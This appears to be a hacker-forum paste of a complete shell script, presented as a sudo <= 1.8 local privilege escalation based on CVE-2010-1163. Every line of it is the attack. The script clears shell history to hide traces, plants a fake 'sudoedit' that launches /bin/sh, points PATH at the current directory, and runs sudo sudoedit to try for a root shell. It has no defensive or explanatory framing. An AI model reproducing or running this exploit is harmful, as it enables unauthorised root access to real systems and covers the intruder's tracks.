SHOW:
|
|
- or go back to the newest paste.
1 | #!/bin/sh | |
2 | # the return of local privilege escalation through PATH manipulation | |
3 | # Bug re-discovered by VipVince #HF | |
4 | # VipVince 2013 | |
5 | # Thanks LevelUp @HF for rbash help, irish br0z for life | |
6 | # http://www.hackforums.net/member.php?action=profile&uid=7807 | |
7 | ||
8 | echo " ################################################ | |
9 | # sudo <= 1.8 priv esc (based on CVE-2010-1163)# | |
10 | # - VipVince #greetz to HF (2013) # | |
11 | # 4b0u7 t0 dr0p r007 5h3ll!! # | |
12 | ################################################" | |
13 | ||
14 | echo "0day0day0day0day0day0day0day0day0day" | |
15 | echo "f1r57 w3 br34k 0u7 0f rb45h" | |
16 | history -c # clear it homie | |
17 | export HISTFILE="~/.bashrc" | |
18 | export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin" | |
19 | ||
20 | echo "/bin/sh" > sudoedit | |
21 | chmod +x sudoedit | |
22 | id | |
23 | export PATH=. | |
24 | /usr/bin/sudo sudoedit /etc/hosts | |
25 | id | |
26 | echo "1f y0u 4r3 n07 r007, 7ry 4g41n 5k1dz" |